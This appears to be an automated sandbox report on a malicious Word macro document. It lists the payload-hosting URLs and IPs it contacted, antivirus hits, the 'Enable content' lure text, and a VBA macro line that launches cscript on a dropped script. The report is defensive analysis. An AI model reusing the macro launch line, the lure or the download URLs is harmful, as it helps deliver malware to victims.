Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
136.243.74.161	ghapan.com	Germany	24940	HETZNER-ASDE	true
143.95.80.83	chaturanga.groopy.com	United States	62729	ASMALLORANGE1US	true
192.185.17.114	gruasingenieria.pe	United States	46606	UNIFIEDLAYER-AS-1US	true
210.211.111.87	yoowi.net	Viet Nam	38731	VTDC-AS-VNVietel-CHTCompamyLtdVN	true

Contacted Domains

Name	IP	Active
ghapan.com	136.243.74.161	true
yoowi.net	210.211.111.87	true
chaturanga.groopy.com	143.95.80.83	true
gruasingenieria.pe	192.185.17.114	true
lotolands.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi	false	Avira URL Cloud: safe	unknown
https://gruasingenieria.pe/LUS1NTVui6/090921.html	true	Avira URL Cloud: safe	unknown
https://ghapan.com/Kdg73onC3oQ/090921.html	true	Avira URL Cloud: safe	unknown
https://chaturanga.groopy.com/7SEZBnhMLW/130921.html	true	Avira URL Cloud: safe	unknown
https://yoowi.net/tDzEJ8uVGwdj/130921.html	true	Avira URL Cloud: safe	unknown
https://ghapan.com/cgi-sys/suspendedpage.cgi	true	Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for submitted file

Source: sample.doc.doc	Virustotal: Detection: 50%			Perma Link
Source: sample.doc.doc	ReversingLabs: Detection: 60%

Antivirus / Scanner detection for submitted sample

Source: sample.doc.doc

Avira: detected

Multi AV Scanner detection for domain / URL

Source: ghapan.com	Virustotal: Detection: 8%	Perma Link
Source: yoowi.net	Virustotal: Detection: 8%	Perma Link
Source: chaturanga.groopy.com	Virustotal: Detection: 8%	Perma Link
Source: gruasingenieria.pe	Virustotal: Detection: 7%	Perma Link

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cscript.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: ghapan.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443

Networking:

Yara detected MalDoc

Source: Yara match	File source: sample.doc.doc, type: SAMPLE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: ASMALLORANGE1US ASMALLORANGE1US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1Host: ghapan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: ghapan.com
Source: global traffic	HTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1Host: gruasingenieria.peConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1Host: yoowi.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1Host: chaturanga.groopy.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: chaturanga.groopy.com

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 136.243.74.161 136.243.74.161
Source: Joe Sandbox View	IP Address: 143.95.80.83 143.95.80.83
Source: Joe Sandbox View	IP Address: 192.185.17.114 192.185.17.114
Source: Joe Sandbox View	IP Address: 210.211.111.87 210.211.111.87

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

Source: global traffic

Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cscript.exe, 00000001.00000002.474013786.0000000001D00000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000011.00000002.490483837.0000000001B20000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/7S
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/7SEZBnhMLW/130921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/7SEZBnhMLW/130921.htmlPE
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://chaturanga.groopy.comp
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.c
Source: powershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3o
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3oQ
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/0
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/090921.html
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/Kdg73onC3oQ/090921.htmlPE
Source: powershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.com/cgi-sys/suspendedpage.cgi
Source: powershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmp	String found in binary or memory: https://ghapan.comp
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LU
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LUS
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LUS1N
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LUS1NTVui6/090921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://gruasingenieria.pe/LUS1NTVui6/090921.htmlPE
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4E
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4Ej/
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4Ej/130921.html
Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://lotolands.com/JtaTAt4Ej/130921.htmlPE
Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.ne
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwd
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/1
Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.html
Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp	String found in binary or memory: https://yoowi.net/tDzEJ8uVGwdj/130921.htmlPE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA04FE6-8D47-46DE-880E-C9FDF00950BC}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: ghapan.com

Source: global traffic	HTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1Host: ghapan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: ghapan.com
Source: global traffic	HTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1Host: gruasingenieria.peConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1Host: yoowi.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1Host: chaturanga.groopy.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: chaturanga.groopy.com

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" 0 Page, I of I Words
Source: Screenshot number: 4	Screenshot OCR: Enable content" 0 Page, I of I Words: 0 N@m 13 ;a 10096 G) FI G) ,, . I lm=lk E ' 0
Source: Screenshot number: 8	Screenshot OCR: Enable content" Ru 71)11 qllnn\|\| n$m RunDLL m" RunDLL ,0 There was a problem starting C:\Progr
Source: Document image extraction number: 0	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 0	Screenshot OCR: Enable content"
Source: Document image extraction number: 1	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 1	Screenshot OCR: Enable content"
Source: Screenshot number: 12	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" RunDLL \|~\| ,:Q, There was
Source: Screenshot number: 12	Screenshot OCR: Enable content" RunDLL \|~\| ,:Q, There was a problem starting C:\ProgramOata\www1.dll " C:\Program

Document contains an embedded VBA macro which may execute processes

Source: sample.doc.doc	OLE, VBA macro line: h11.Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48)
Source: VBA code instrumentation	OLE, VBA macro: Module Module3, Function eFile, API IWshShell3.Run("cscript.exe %appdata%\www.txt //E:VBScript //NoLogo %~f0 %*","0")	Name: eFile
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)

Document contains OLE streams with names of living off the land binaries

Source: sample.doc.doc	Stream path 'Macros/deutsche/o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM...................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..